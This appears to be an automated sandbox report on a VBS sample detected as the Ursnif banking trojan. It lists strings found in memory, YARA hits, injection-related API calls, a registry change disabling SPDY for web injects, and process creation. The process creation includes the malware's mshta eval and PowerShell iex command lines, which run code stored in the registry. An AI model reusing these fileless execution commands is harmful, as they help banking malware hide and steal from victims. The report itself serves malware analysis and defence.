            Source: explorer.exe, 00000023.00000000.372710070.0000000008B46000.00000002.00000001.sdmpString found in binary or memory: http://www.galapagosdesign.com/DPlease
            Source: explorer.exe, 00000023.00000000.372710070.0000000008B46000.00000002.00000001.sdmpString found in binary or memory: http://www.galapagosdesign.com/staff/dennis.htm
            Source: explorer.exe, 00000023.00000002.489612892.00000000063F3000.00000002.00000001.sdmpString found in binary or memory: http://www.gismeteo.ru/favicon.ico
            Source: explorer.exe, 00000023.00000002.489612892.00000000063F3000.00000002.00000001.sdmpString found in binary or memory: http://www.gmarket.co.kr/
            Source: explorer.exe, 00000023.00000002.489612892.00000000063F3000.00000002.00000001.sdmpString found in binary or memory: http://www.gmarket.co.kr/favicon.ico
            Source: explorer.exe, 00000023.00000000.372710070.0000000008B46000.00000002.00000001.sdmpString found in binary or memory: http://www.goodfont.co.kr
            Source: explorer.exe, 00000023.00000002.489612892.00000000063F3000.00000002.00000001.sdmpString found in binary or memory: http://www.google.co.in/
            Source: explorer.exe, 00000023.00000002.489612892.00000000063F3000.00000002.00000001.sdmpString found in binary or memory: http://www.google.co.jp/
            Source: explorer.exe, 00000023.00000002.489612892.00000000063F3000.00000002.00000001.sdmpString found in binary or memory: http://www.google.co.uk/
            Source: explorer.exe, 00000023.00000002.489612892.00000000063F3000.00000002.00000001.sdmpString found in binary or memory: http://www.google.com.br/
            Source: explorer.exe, 00000023.00000002.489612892.00000000063F3000.00000002.00000001.sdmpString found in binary or memory: http://www.google.com.sa/
            Source: explorer.exe, 00000023.00000002.489612892.00000000063F3000.00000002.00000001.sdmpString found in binary or memory: http://www.google.com.tw/
            Source: explorer.exe, 00000023.00000002.489612892.00000000063F3000.00000002.00000001.sdmpString found in binary or memory: http://www.google.com/
            Source: explorer.exe, 00000023.00000002.489612892.00000000063F3000.00000002.00000001.sdmpString found in binary or memory: http://www.google.com/favicon.ico
            Source: explorer.exe, 00000023.00000002.489612892.00000000063F3000.00000002.00000001.sdmpString found in binary or memory: http://www.google.cz/
            Source: explorer.exe, 00000023.00000002.489612892.00000000063F3000.00000002.00000001.sdmpString found in binary or memory: http://www.google.de/
            Source: explorer.exe, 00000023.00000002.489612892.00000000063F3000.00000002.00000001.sdmpString found in binary or memory: http://www.google.es/
            Source: explorer.exe, 00000023.00000002.489612892.00000000063F3000.00000002.00000001.sdmpString found in binary or memory: http://www.google.fr/
            Source: explorer.exe, 00000023.00000002.489612892.00000000063F3000.00000002.00000001.sdmpString found in binary or memory: http://www.google.it/
            Source: explorer.exe, 00000023.00000002.489612892.00000000063F3000.00000002.00000001.sdmpString found in binary or memory: http://www.google.pl/
            Source: explorer.exe, 00000023.00000002.489612892.00000000063F3000.00000002.00000001.sdmpString found in binary or memory: http://www.google.ru/
            Source: explorer.exe, 00000023.00000002.489612892.00000000063F3000.00000002.00000001.sdmpString found in binary or memory: http://www.google.si/
            Source: explorer.exe, 00000023.00000002.489612892.00000000063F3000.00000002.00000001.sdmpString found in binary or memory: http://www.iask.com/
            Source: explorer.exe, 00000023.00000002.489612892.00000000063F3000.00000002.00000001.sdmpString found in binary or memory: http://www.iask.com/favicon.ico
            Source: explorer.exe, 00000023.00000000.372710070.0000000008B46000.00000002.00000001.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/
            Source: explorer.exe, 00000023.00000002.489612892.00000000063F3000.00000002.00000001.sdmpString found in binary or memory: http://www.kkbox.com.tw/
            Source: explorer.exe, 00000023.00000002.489612892.00000000063F3000.00000002.00000001.sdmpString found in binary or memory: http://www.kkbox.com.tw/favicon.ico
            Source: explorer.exe, 00000023.00000002.489612892.00000000063F3000.00000002.00000001.sdmpString found in binary or memory: http://www.linternaute.com/favicon.ico
            Source: explorer.exe, 00000023.00000002.489612892.00000000063F3000.00000002.00000001.sdmpString found in binary or memory: http://www.maktoob.com/favicon.ico
            Source: explorer.exe, 00000023.00000002.489612892.00000000063F3000.00000002.00000001.sdmpString found in binary or memory: http://www.mercadolibre.com.mx/
            Source: explorer.exe, 00000023.00000002.489612892.00000000063F3000.00000002.00000001.sdmpString found in binary or memory: http://www.mercadolibre.com.mx/favicon.ico
            Source: explorer.exe, 00000023.00000002.489612892.00000000063F3000.00000002.00000001.sdmpString found in binary or memory: http://www.mercadolivre.com.br/
            Source: explorer.exe, 00000023.00000002.489612892.00000000063F3000.00000002.00000001.sdmpString found in binary or memory: http://www.mercadolivre.com.br/favicon.ico
            Source: explorer.exe, 00000023.00000002.489612892.00000000063F3000.00000002.00000001.sdmpString found in binary or memory: http://www.merlin.com.pl/
            Source: explorer.exe, 00000023.00000002.489612892.00000000063F3000.00000002.00000001.sdmpString found in binary or memory: http://www.merlin.com.pl/favicon.ico
            Source: explorer.exe, 00000023.00000002.489612892.00000000063F3000.00000002.00000001.sdmpString found in binary or memory: http://www.microsofttranslator.com/?ref=IE8Activity
            Source: explorer.exe, 00000023.00000002.489612892.00000000063F3000.00000002.00000001.sdmpString found in binary or memory: http://www.microsofttranslator.com/BV.aspx?ref=IE8Activity&amp;a=
            Source: explorer.exe, 00000023.00000002.489612892.00000000063F3000.00000002.00000001.sdmpString found in binary or memory: http://www.microsofttranslator.com/BVPrev.aspx?ref=IE8Activity
            Source: explorer.exe, 00000023.00000002.489612892.00000000063F3000.00000002.00000001.sdmpString found in binary or memory: http://www.microsofttranslator.com/Default.aspx?ref=IE8Activity
            Source: explorer.exe, 00000023.00000002.489612892.00000000063F3000.00000002.00000001.sdmpString found in binary or memory: http://www.microsofttranslator.com/DefaultPrev.aspx?ref=IE8Activity
            Source: explorer.exe, 00000023.00000002.489612892.00000000063F3000.00000002.00000001.sdmpString found in binary or memory: http://www.mtv.com/
            Source: explorer.exe, 00000023.00000002.489612892.00000000063F3000.00000002.00000001.sdmpString found in binary or memory: http://www.mtv.com/favicon.ico
            Source: explorer.exe, 00000023.00000002.489612892.00000000063F3000.00000002.00000001.sdmpString found in binary or memory: http://www.myspace.com/favicon.ico
            Source: explorer.exe, 00000023.00000002.489612892.00000000063F3000.00000002.00000001.sdmpString found in binary or memory: http://www.najdi.si/
            Source: explorer.exe, 00000023.00000002.489612892.00000000063F3000.00000002.00000001.sdmpString found in binary or memory: http://www.najdi.si/favicon.ico
            Source: explorer.exe, 00000023.00000002.489612892.00000000063F3000.00000002.00000001.sdmpString found in binary or memory: http://www.nate.com/favicon.ico
            Source: explorer.exe, 00000023.00000002.489612892.00000000063F3000.00000002.00000001.sdmpString found in binary or memory: http://www.neckermann.de/
            Source: explorer.exe, 00000023.00000002.489612892.00000000063F3000.00000002.00000001.sdmpString found in binary or memory: http://www.neckermann.de/favicon.ico
            Source: explorer.exe, 00000023.00000002.489612892.00000000063F3000.00000002.00000001.sdmpString found in binary or memory: http://www.news.com.au/favicon.ico
            Source: explorer.exe, 00000023.00000002.489612892.00000000063F3000.00000002.00000001.sdmpString found in binary or memory: http://www.nifty.com/favicon.ico
            Source: explorer.exe, 00000023.00000002.489612892.00000000063F3000.00000002.00000001.sdmpString found in binary or memory: http://www.ocn.ne.jp/favicon.ico
            Source: explorer.exe, 00000023.00000002.489612892.00000000063F3000.00000002.00000001.sdmpString found in binary or memory: http://www.orange.fr/
            Source: explorer.exe, 00000023.00000002.489612892.00000000063F3000.00000002.00000001.sdmpString found in binary or memory: http://www.otto.de/favicon.ico
            Source: explorer.exe, 00000023.00000002.489612892.00000000063F3000.00000002.00000001.sdmpString found in binary or memory: http://www.ozon.ru/
            Source: explorer.exe, 00000023.00000002.489612892.00000000063F3000.00000002.00000001.sdmpString found in binary or memory: http://www.ozon.ru/favicon.ico
            Source: explorer.exe, 00000023.00000002.489612892.00000000063F3000.00000002.00000001.sdmpString found in binary or memory: http://www.ozu.es/favicon.ico
            Source: explorer.exe, 00000023.00000002.489612892.00000000063F3000.00000002.00000001.sdmpString found in binary or memory: http://www.paginasamarillas.es/
            Source: explorer.exe, 00000023.00000002.489612892.00000000063F3000.00000002.00000001.sdmpString found in binary or memory: http://www.paginasamarillas.es/favicon.ico
            Source: explorer.exe, 00000023.00000002.489612892.00000000063F3000.00000002.00000001.sdmpString found in binary or memory: http://www.pchome.com.tw/favicon.ico
            Source: explorer.exe, 00000023.00000002.489612892.00000000063F3000.00000002.00000001.sdmpString found in binary or memory: http://www.priceminister.com/
            Source: explorer.exe, 00000023.00000002.489612892.00000000063F3000.00000002.00000001.sdmpString found in binary or memory: http://www.priceminister.com/favicon.ico
            Source: explorer.exe, 00000023.00000002.489612892.00000000063F3000.00000002.00000001.sdmpString found in binary or memory: http://www.rakuten.co.jp/favicon.ico
            Source: explorer.exe, 00000023.00000002.489612892.00000000063F3000.00000002.00000001.sdmpString found in binary or memory: http://www.rambler.ru/
            Source: explorer.exe, 00000023.00000002.489612892.00000000063F3000.00000002.00000001.sdmpString found in binary or memory: http://www.rambler.ru/favicon.ico
            Source: explorer.exe, 00000023.00000002.489612892.00000000063F3000.00000002.00000001.sdmpString found in binary or memory: http://www.recherche.aol.fr/
            Source: explorer.exe, 00000023.00000002.489612892.00000000063F3000.00000002.00000001.sdmpString found in binary or memory: http://www.rtl.de/
            Source: explorer.exe, 00000023.00000002.489612892.00000000063F3000.00000002.00000001.sdmpString found in binary or memory: http://www.rtl.de/favicon.ico
            Source: explorer.exe, 00000023.00000000.372710070.0000000008B46000.00000002.00000001.sdmpString found in binary or memory: http://www.sajatypeworks.com
            Source: explorer.exe, 00000023.00000000.372710070.0000000008B46000.00000002.00000001.sdmpString found in binary or memory: http://www.sakkal.com
            Source: explorer.exe, 00000023.00000000.372710070.0000000008B46000.00000002.00000001.sdmpString found in binary or memory: http://www.sandoll.co.kr
            Source: explorer.exe, 00000023.00000002.489612892.00000000063F3000.00000002.00000001.sdmpString found in binary or memory: http://www.servicios.clarin.com/
            Source: explorer.exe, 00000023.00000002.489612892.00000000063F3000.00000002.00000001.sdmpString found in binary or memory: http://www.shopzilla.com/
            Source: explorer.exe, 00000023.00000002.489612892.00000000063F3000.00000002.00000001.sdmpString found in binary or memory: http://www.sify.com/favicon.ico
            Source: explorer.exe, 00000023.00000002.489612892.00000000063F3000.00000002.00000001.sdmpString found in binary or memory: http://www.so-net.ne.jp/share/favicon.ico
            Source: explorer.exe, 00000023.00000002.489612892.00000000063F3000.00000002.00000001.sdmpString found in binary or memory: http://www.sogou.com/
            Source: explorer.exe, 00000023.00000002.489612892.00000000063F3000.00000002.00000001.sdmpString found in binary or memory: http://www.sogou.com/favicon.ico
            Source: explorer.exe, 00000023.00000002.489612892.00000000063F3000.00000002.00000001.sdmpString found in binary or memory: http://www.soso.com/
            Source: explorer.exe, 00000023.00000002.489612892.00000000063F3000.00000002.00000001.sdmpString found in binary or memory: http://www.soso.com/favicon.ico
            Source: explorer.exe, 00000023.00000002.489612892.00000000063F3000.00000002.00000001.sdmpString found in binary or memory: http://www.t-online.de/favicon.ico
            Source: explorer.exe, 00000023.00000002.489612892.00000000063F3000.00000002.00000001.sdmpString found in binary or memory: http://www.taobao.com/
            Source: explorer.exe, 00000023.00000002.489612892.00000000063F3000.00000002.00000001.sdmpString found in binary or memory: http://www.taobao.com/favicon.ico
            Source: explorer.exe, 00000023.00000002.489612892.00000000063F3000.00000002.00000001.sdmpString found in binary or memory: http://www.target.com/
            Source: explorer.exe, 00000023.00000002.489612892.00000000063F3000.00000002.00000001.sdmpString found in binary or memory: http://www.target.com/favicon.ico
            Source: explorer.exe, 00000023.00000002.489612892.00000000063F3000.00000002.00000001.sdmpString found in binary or memory: http://www.tchibo.de/
            Source: explorer.exe, 00000023.00000002.489612892.00000000063F3000.00000002.00000001.sdmpString found in binary or memory: http://www.tchibo.de/favicon.ico
            Source: explorer.exe, 00000023.00000002.489612892.00000000063F3000.00000002.00000001.sdmpString found in binary or memory: http://www.tesco.com/
            Source: explorer.exe, 00000023.00000002.489612892.00000000063F3000.00000002.00000001.sdmpString found in binary or memory: http://www.tesco.com/favicon.ico
            Source: explorer.exe, 00000023.00000002.489612892.00000000063F3000.00000002.00000001.sdmpString found in binary or memory: http://www.timesonline.co.uk/img/favicon.ico
            Source: explorer.exe, 00000023.00000000.372710070.0000000008B46000.00000002.00000001.sdmpString found in binary or memory: http://www.tiro.com
            Source: explorer.exe, 00000023.00000002.489612892.00000000063F3000.00000002.00000001.sdmpString found in binary or memory: http://www.tiscali.it/favicon.ico
            Source: explorer.exe, 00000023.00000000.372710070.0000000008B46000.00000002.00000001.sdmpString found in binary or memory: http://www.typography.netD
            Source: explorer.exe, 00000023.00000002.489612892.00000000063F3000.00000002.00000001.sdmpString found in binary or memory: http://www.univision.com/
            Source: explorer.exe, 00000023.00000002.489612892.00000000063F3000.00000002.00000001.sdmpString found in binary or memory: http://www.univision.com/favicon.ico
            Source: explorer.exe, 00000023.00000000.372710070.0000000008B46000.00000002.00000001.sdmpString found in binary or memory: http://www.urwpp.deDPlease
            Source: explorer.exe, 00000023.00000002.489612892.00000000063F3000.00000002.00000001.sdmpString found in binary or memory: http://www.walmart.com/
            Source: explorer.exe, 00000023.00000002.489612892.00000000063F3000.00000002.00000001.sdmpString found in binary or memory: http://www.walmart.com/favicon.ico
            Source: explorer.exe, 00000023.00000002.489612892.00000000063F3000.00000002.00000001.sdmpString found in binary or memory: http://www.ya.com/favicon.ico
            Source: explorer.exe, 00000023.00000002.489612892.00000000063F3000.00000002.00000001.sdmpString found in binary or memory: http://www.yam.com/favicon.ico
            Source: explorer.exe, 00000023.00000000.372710070.0000000008B46000.00000002.00000001.sdmpString found in binary or memory: http://www.zhongyicts.com.cn
            Source: explorer.exe, 00000023.00000002.489612892.00000000063F3000.00000002.00000001.sdmpString found in binary or memory: http://www3.fnac.com/
            Source: explorer.exe, 00000023.00000002.489612892.00000000063F3000.00000002.00000001.sdmpString found in binary or memory: http://www3.fnac.com/favicon.ico
            Source: explorer.exe, 00000023.00000002.489612892.00000000063F3000.00000002.00000001.sdmpString found in binary or memory: http://xml-us.amznxslt.com/onca/xml?Service=AWSECommerceService&amp;Version=2008-06-26&amp;Operation
            Source: explorer.exe, 00000023.00000002.489612892.00000000063F3000.00000002.00000001.sdmpString found in binary or memory: http://z.about.com/m/a08.ico
            Source: powershell.exe, 00000015.00000003.310590645.00000267015AF000.00000004.00000001.sdmpString found in binary or memory: https://contoso.com/
            Source: powershell.exe, 00000015.00000003.310590645.00000267015AF000.00000004.00000001.sdmpString found in binary or memory: https://contoso.com/Icon
            Source: powershell.exe, 00000015.00000003.310590645.00000267015AF000.00000004.00000001.sdmpString found in binary or memory: https://contoso.com/License
            Source: powershell.exe, 00000015.00000003.310300551.00000267013E9000.00000004.00000001.sdmpString found in binary or memory: https://github.com/Pester/Pester
            Source: powershell.exe, 00000015.00000003.310590645.00000267015AF000.00000004.00000001.sdmpString found in binary or memory: https://nuget.org/nuget.exe
            Source: powershell.exe, 00000015.00000003.309171435.0000026701057000.00000004.00000001.sdmpString found in binary or memory: https://oneget.org
            Source: powershell.exe, 00000015.00000003.309171435.0000026701057000.00000004.00000001.sdmpString found in binary or memory: https://oneget.orgX
            Source: powershell.exe, 00000015.00000003.309171435.0000026701057000.00000004.00000001.sdmpString found in binary or memory: https://oneget.orgformat.ps1xmlagement.dll2040.missionsand

            Key, Mouse, Clipboard, Microphone and Screen Capturing:

            barindex
            Yara detected UrsnifShow sources
            Source: Yara matchFile source: 00000003.00000003.342326677.00000000046E0000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000003.00000003.270925261.0000000005488000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000003.00000003.271044990.0000000005488000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000003.00000003.283759695.000000000530B000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000003.00000003.270893136.0000000005488000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000003.00000003.271117901.0000000005488000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000026.00000002.473275595.000001776603E000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000023.00000002.488542478.000000000613E000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000003.00000003.270863314.0000000005488000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000003.00000003.270967614.0000000005488000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000003.00000003.271019633.0000000005488000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000003.00000003.271092585.0000000005488000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000015.00000003.348157353.00000267796D0000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000003.00000002.384731401.00000000059A0000.00000040.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000025.00000002.477516114.000001FC1383E000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: RuntimeBroker.exe PID: 3668, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: RuntimeBroker.exe PID: 4376, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: explorer.exe PID: 3388, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 6356, type: MEMORY

            E-Banking Fraud:

            barindex
            Yara detected UrsnifShow sources
            Source: Yara matchFile source: 00000003.00000003.342326677.00000000046E0000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000003.00000003.270925261.0000000005488000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000003.00000003.271044990.0000000005488000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000003.00000003.283759695.000000000530B000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000003.00000003.270893136.0000000005488000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000003.00000003.271117901.0000000005488000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000026.00000002.473275595.000001776603E000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000023.00000002.488542478.000000000613E000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000003.00000003.270863314.0000000005488000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000003.00000003.270967614.0000000005488000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000003.00000003.271019633.0000000005488000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000003.00000003.271092585.0000000005488000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000015.00000003.348157353.00000267796D0000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000003.00000002.384731401.00000000059A0000.00000040.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000025.00000002.477516114.000001FC1383E000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: RuntimeBroker.exe PID: 3668, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: RuntimeBroker.exe PID: 4376, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: explorer.exe PID: 3388, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 6356, type: MEMORY
            Disables SPDY (HTTP compression, likely to perform web injects)Show sources
            Source: C:\Windows\explorer.exeRegistry key value created / modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings EnableSPDY3_0 0

            System Summary:

            barindex
            Source: C:\Windows\explorer.exeCode function: 35_2_0612676C RtlAllocateHeap,NtSetContextThread,NtUnmapViewOfSection,NtClose,35_2_0612676C
            Source: C:\Windows\explorer.exeCode function: 35_2_0611FFCC NtMapViewOfSection,35_2_0611FFCC
            Source: C:\Windows\explorer.exeCode function: 35_2_0610CCA0 NtReadVirtualMemory,35_2_0610CCA0
            Source: C:\Windows\explorer.exeCode function: 35_2_0611AD14 NtQuerySystemInformation,35_2_0611AD14
            Source: C:\Windows\explorer.exeCode function: 35_2_0611F560 NtSetInformationProcess,CreateRemoteThread,ResumeThread,FindCloseChangeNotification,35_2_0611F560
            Source: C:\Windows\explorer.exeCode function: 35_2_0610BAB4 NtAllocateVirtualMemory,35_2_0610BAB4
            Source: C:\Windows\explorer.exeCode function: 35_2_06111AC4 NtQueryInformationProcess,35_2_06111AC4
            Source: C:\Windows\explorer.exeCode function: 35_2_06113830 NtWriteVirtualMemory,35_2_06113830
            Source: C:\Windows\explorer.exeCode function: 35_2_0611387C NtCreateSection,35_2_0611387C
            Source: C:\Windows\explorer.exeCode function: 35_2_0610B75C35_2_0610B75C
            Source: C:\Windows\explorer.exeCode function: 35_2_0611F77035_2_0611F770
            Source: C:\Windows\explorer.exeCode function: 35_2_0612676C35_2_0612676C
            Source: C:\Windows\explorer.exeCode function: 35_2_061037B835_2_061037B8
            Source: C:\Windows\explorer.exeCode function: 35_2_0612AFB835_2_0612AFB8
            Source: C:\Windows\explorer.exeCode function: 35_2_0612003435_2_06120034
            Source: C:\Windows\explorer.exeCode function: 35_2_0610C13435_2_0610C134
            Source: C:\Windows\explorer.exeCode function: 35_2_0611913835_2_06119138
            Source: C:\Windows\explorer.exeCode function: 35_2_0610AE0435_2_0610AE04
            Source: C:\Windows\explorer.exeCode function: 35_2_0612BEB035_2_0612BEB0
            Source: C:\Windows\explorer.exeCode function: 35_2_061226B435_2_061226B4
            Source: C:\Windows\explorer.exeCode function: 35_2_06109F9835_2_06109F98
            Source: C:\Windows\explorer.exeCode function: 35_2_061117B835_2_061117B8
            Source: C:\Windows\explorer.exeCode function: 35_2_0610547435_2_06105474
            Source: C:\Windows\explorer.exeCode function: 35_2_0610D46035_2_0610D460
            Source: C:\Windows\explorer.exeCode function: 35_2_06119CB035_2_06119CB0
            Source: C:\Windows\explorer.exeCode function: 35_2_061294B835_2_061294B8
            Source: C:\Windows\explorer.exeCode function: 35_2_0612A4BC35_2_0612A4BC
            Source: C:\Windows\explorer.exeCode function: 35_2_0611D4A835_2_0611D4A8
            Source: C:\Windows\explorer.exeCode function: 35_2_06110CC035_2_06110CC0
            Source: C:\Windows\explorer.exeCode function: 35_2_061274CC35_2_061274CC
            Source: C:\Windows\explorer.exeCode function: 35_2_0610BCF835_2_0610BCF8
            Source: C:\Windows\explorer.exeCode function: 35_2_06113CE035_2_06113CE0
            Source: C:\Windows\explorer.exeCode function: 35_2_0612B51635_2_0612B516
            Source: C:\Windows\explorer.exeCode function: 35_2_06106D0835_2_06106D08
            Source: C:\Windows\explorer.exeCode function: 35_2_0611B52035_2_0611B520
            Source: C:\Windows\explorer.exeCode function: 35_2_0611452C35_2_0611452C
            Source: C:\Windows\explorer.exeCode function: 35_2_06111D9435_2_06111D94
            Source: C:\Windows\explorer.exeCode function: 35_2_0612320835_2_06123208
            Source: C:\Windows\explorer.exeCode function: 35_2_0612822435_2_06128224
            Source: C:\Windows\explorer.exeCode function: 35_2_0610732035_2_06107320
            Source: C:\Windows\explorer.exeCode function: 35_2_06108B5C35_2_06108B5C
            Source: C:\Windows\explorer.exeCode function: 35_2_06118B4C35_2_06118B4C
            Source: C:\Windows\explorer.exeCode function: 35_2_0611938035_2_06119380
            Source: C:\Windows\explorer.exeCode function: 35_2_06102BC835_2_06102BC8
            Source: C:\Windows\explorer.exeCode function: 35_2_0610203C35_2_0610203C
            Source: C:\Windows\explorer.exeCode function: 35_2_0611B04035_2_0611B040
            Source: C:\Windows\explorer.exeCode function: 35_2_0612606435_2_06126064
            Source: C:\Windows\explorer.exeCode function: 35_2_0612E08035_2_0612E080
            Source: C:\Windows\explorer.exeCode function: 35_2_061220F835_2_061220F8
            Source: C:\Windows\explorer.exeCode function: 35_2_0612F94035_2_0612F940
            Source: C:\Windows\explorer.exeCode function: 35_2_0611117435_2_06111174
            Source: C:\Windows\explorer.exeCode function: 35_2_061291A035_2_061291A0
            Source: Joe Sandbox ViewDropped File: C:\Users\user\AppData\Local\Temp\earmark.avchd 66EAF5C2BC2EC2A01D74DB9CC50744C748388CD9B0FA1F07181E639E128803EF
            Source: 0k4Vu1eOEIhU.vbsInitial sample: Strings found which are bigger than 50
            Source: gf33rpcq.dll.29.drStatic PE information: No import functions for PE file found
            Source: 1b1iaete.dll.25.drStatic PE information: No import functions for PE file found
            Source: C:\Windows\System32\mshta.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\OUTLOOK.EXEJump to behavior
            Source: C:\Windows\explorer.exeSection loaded: cryptdlg.dll
            Source: C:\Windows\explorer.exeSection loaded: msimg32.dll
            Source: classification engineClassification label: mal100.bank.troj.spyw.evad.winVBS@29/40@7/1
            Source: C:\Program Files\internet explorer\iexplore.exeFile created: C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Recovery\HighJump to behavior
            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4640:120:WilError_01
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMutant created: \Sessions\1\BaseNamedObjects\{4AA7BD5B-21EE-0C31-FB1E-E5005F32E934}
            Source: C:\Windows\System32\wscript.exeFile created: C:\Users\user\AppData\Local\Temp\adobe.urlJump to behavior
            Source: unknownProcess created: C:\Windows\System32\wscript.exe C:\Windows\System32\wscript.exe 'C:\Users\user\Desktop\0k4Vu1eOEIhU.vbs'
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_64\mscorlib\ac26e2af62f23e37e645b5e44068a025\mscorlib.ni.dllJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorlib.dllJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorlib.dllJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorlib.dllJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorlib.dll
            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorlib.dll
            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorlib.dll
            Source: C:\Windows\System32\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process
            Source: C:\Windows\System32\wscript.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
            Source: C:\Windows\System32\wscript.exeFile read: C:\Users\desktop.iniJump to behavior
            Source: C:\Windows\System32\wscript.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
            Source: unknownProcess created: C:\Windows\System32\rundll32.exe 'C:\Windows\system32\rundll32.exe' Shell32.dll,Control_RunDLL -h
            Source: unknownProcess created: C:\Windows\System32\wscript.exe C:\Windows\System32\wscript.exe 'C:\Users\user\Desktop\0k4Vu1eOEIhU.vbs'
            Source: unknownProcess created: C:\Program Files\internet explorer\iexplore.exe 'C:\Program Files\Internet Explorer\iexplore.exe' -Embedding
            Source: unknownProcess created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:6360 CREDAT:17410 /prefetch:2
            Source: unknownProcess created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:6360 CREDAT:17422 /prefetch:2
            Source: unknownProcess created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:6360 CREDAT:17428 /prefetch:2
            Source: unknownProcess created: C:\Windows\System32\mshta.exe 'C:\Windows\System32\mshta.exe' 'about:<hta:application><script>resizeTo(1,1);eval(new ActiveXObject('WScript.Shell').regread('HKCU\\\Software\\AppDataLow\\Software\\Microsoft\\86EC23E5-2D5A-A875-E71A-B15C0BEE7550\\\Actidsrv'));if(!window.flag)close()</script>'
            Source: unknownProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\86EC23E5-2D5A-A875-E71A-B15C0BEE7550').basebapi))
            Source: unknownProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: unknownProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\1b1iaete\1b1iaete.cmdline'
            Source: unknownProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 '/OUT:C:\Users\user\AppData\Local\Temp\RES3556.tmp' 'c:\Users\user\AppData\Local\Temp\1b1iaete\CSC8D8F05B01A304F97BCE9A6F7324A364.TMP'
